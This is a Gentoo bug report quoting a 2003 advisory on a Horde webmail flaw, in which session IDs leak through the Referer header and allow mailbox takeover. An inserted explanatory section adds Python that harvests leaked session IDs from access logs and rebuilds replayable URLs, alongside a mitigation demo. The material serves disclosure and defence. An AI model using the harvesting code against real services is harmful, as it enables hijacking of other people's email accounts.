Bug 26804 - net-www/horde
Summary: net-www/horde
Status: RESOLVED FIXED
Alias: None
Product: Gentoo Linux
Classification: Unclassified
Component: New packages
Hardware: All Linux
Importance: Highest critical
Assignee: Gentoo Security
Reported: 2003-08-17 07:02 UTC by Daniel Ahlberg (RETIRED)
Modified: 2003-09-01 07:25 UTC
Description Daniel Ahlberg (RETIRED) gentoo-dev 2003-08-17 07:02:02 UTC
> --------------------------- 
> PUCCIOLAB.ORG - ADVISORIES 
> <http://www.pucciolab.org> 
> --------------------------- 
> 
> PCL-0001: Remote Vulnerability in HORDE MTA < 2.2.4 
> 
> --------------------------------------------------------------------------- 
> PuCCiOLAB.ORG Security Advisories                      puccio@pucciolab.org 
> http://www.pucciolab.org                          Vincenzo 'puccio' Ciaglia 
> August 12th, 2003 
> --------------------------------------------------------------------------- 
> 
> Package        : Horde MTA 
> Vulnerability  : access to private account without login 
> Problem-Type   : remote 
> Version        : All < 2.2.4 
> Official Site  : http://horde.org/ 
> N° Advisories  : 0001 
> 
> ************************ 
> Description of problem 
> ************************ 
> An attacker could send an email to a victim who makes use of HORDE MTA in 
> order to push them to visit a website. The website in question logs all 
> accesses and records in particular the origin (Referer) of every visitor. 
> 
> Example: 
> ------------------- 
> MY STAT FOR MY WEBSITE - REFERENT DOMAIN 
> 
> HTTP://MYSITE.MYSOCIETY.NET/HORDE/IMP/MESSAGE.PHP?HORDE=FC235847D2C8A88190C879B290D12630&INDEX=XXX 
> 
> In this example, the victim has viewed our website while reading the mail 
> that we sent. By visiting the link recorded by our access counter, we will 
> be able to reach the victim's mail management page and will be able to 
> read and send their email at leisure, without logging in. The session is 
> closed after approximately 20 minutes, and the hacker has that much time 
> to do as he pleases. 
> 
> ************************* 
> What could an attacker do? 
> ************************* 
> Read, write and fake your e-mail. He could send, from your email address, a 
> mail to your ISP and ask it for the user and password of your website. The 
> consequences would be catastrophic. 
> 
> ************************* 
> What can I do? 
> ************************* 
> Upgrade your MTA agent to version 2.2.4. 
> 
> Greetings, 
> Vincenzo 'puccio' Ciaglia 
> www.pucciolab.org
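The mechanism the advisory describes is a session ID carried in the webmail URL (the Horde query parameter) that leaks to any third-party site through the browser's Referer header, after which replaying that URL within the session lifetime is enough to enter the mailbox. The Python below is an added illustration of both halves of that problem; it is not code from Horde/IMP, from the Gentoo bug, or from the advisory author. The access-log lines, host names, IP addresses and session values are constructed for the demo, and the dereferer path /horde/services/go.php is an assumed example name used to show the mitigation pattern (route outbound links through a redirect page that carries no session token), not a claim about what any Horde release ships.

```python
import re
from urllib.parse import parse_qs, urlencode, urlsplit

# Apache "combined" log format; the two trailing quoted fields are Referer and User-Agent.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample of the attacker's web server access log (not real traffic).
# Line 1: a victim arrived from an IMP message page that carries its session ID in the URL.
# Line 2: a visitor with no Referer at all.
# Line 3: a victim arrived through a dereferer page, so no session ID is exposed.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Aug/2003:10:01:22 +0200] "GET /promo.html HTTP/1.1" 200 512 "http://mysite.mysociety.net/horde/imp/message.php?Horde=fc235847d2c8a88190c879b290d12630&index=123" "Mozilla/5.0"
198.51.100.9 - - [12/Aug/2003:10:02:03 +0200] "GET /promo.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.44 - - [12/Aug/2003:10:05:41 +0200] "GET /promo.html HTTP/1.1" 200 512 "http://mysite.mysociety.net/horde/services/go.php?url=http%3A%2F%2Fattacker.example%2Fpromo.html" "Mozilla/5.0"
"""


def parse_combined(line):
    """Split one combined-format log line into its fields, or None if it does not match."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def session_from_referer(referer):
    """Return (webmail_host, session_id) when the Referer is a Horde URL whose query
    string carries the session ID in the 'Horde' parameter; otherwise None."""
    if not referer or referer == "-":
        return None
    parts = urlsplit(referer)
    if "/horde/" not in parts.path:
        return None
    sid = parse_qs(parts.query).get("Horde")
    if not sid:
        return None
    return parts.netloc, sid[0]


def harvest_sessions(log_text):
    """The attacker's side of the advisory: walk the access log and collect every
    (visitor_ip, webmail_host, session_id) that leaked through a Referer header.
    Replaying the original Referer URL within the session lifetime is what the
    advisory describes as entering the mailbox without logging in."""
    found = []
    for line in log_text.splitlines():
        rec = parse_combined(line)
        if rec is None:
            continue
        hit = session_from_referer(rec["referer"])
        if hit is not None:
            found.append((rec["ip"],) + hit)
    return found


def message_page_url(host, session_id, index):
    """Build an IMP message URL of the shape shown in the advisory (session ID in the query)."""
    return "http://%s/horde/imp/message.php?%s" % (
        host, urlencode({"Horde": session_id, "index": index}))


def browser_referer(page_url, link_url, dereferer=None):
    """Model the Referer a browser sends when the victim clicks link_url from page_url.

    Without a dereferer the browser sends the full page URL, session ID included
    (the vulnerable case). With one, the webmail rewrites outbound links through a
    redirect page that carries only the target URL, so that page is all the third
    party ever sees. The go.php path passed by callers is an assumed example name."""
    if dereferer is None:
        return page_url
    return dereferer + "?" + urlencode({"url": link_url})


def leak_demo():
    """Return (vulnerable_hit, hardened_hit) for one simulated click each way."""
    page = message_page_url("mysite.mysociety.net", "fc235847d2c8a88190c879b290d12630", 123)
    link = "http://attacker.example/promo.html"
    vulnerable = session_from_referer(browser_referer(page, link))
    hardened = session_from_referer(browser_referer(
        page, link, dereferer="http://mysite.mysociety.net/horde/services/go.php"))
    return vulnerable, hardened


if __name__ == "__main__":
    for ip, host, sid in harvest_sessions(SAMPLE_LOG):
        print("session %s for %s leaked by visitor %s" % (sid, host, ip))
    print(leak_demo())
```

The harvesting step is deliberately dumb: anything that logs Referer headers (a stats counter, a web server, an image host) collects these tokens without any attacker code running on the victim's side, which is why a 20-minute session lifetime is plenty. A dereferer only narrows the exposure; the durable fix is to keep the session identifier out of the URL entirely (cookie-only sessions), so no Referer can carry it.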
Comment 2 Daniel Ahlberg (RETIRED) gentoo-dev 2003-09-01 07:25:40 UTC
glsa sent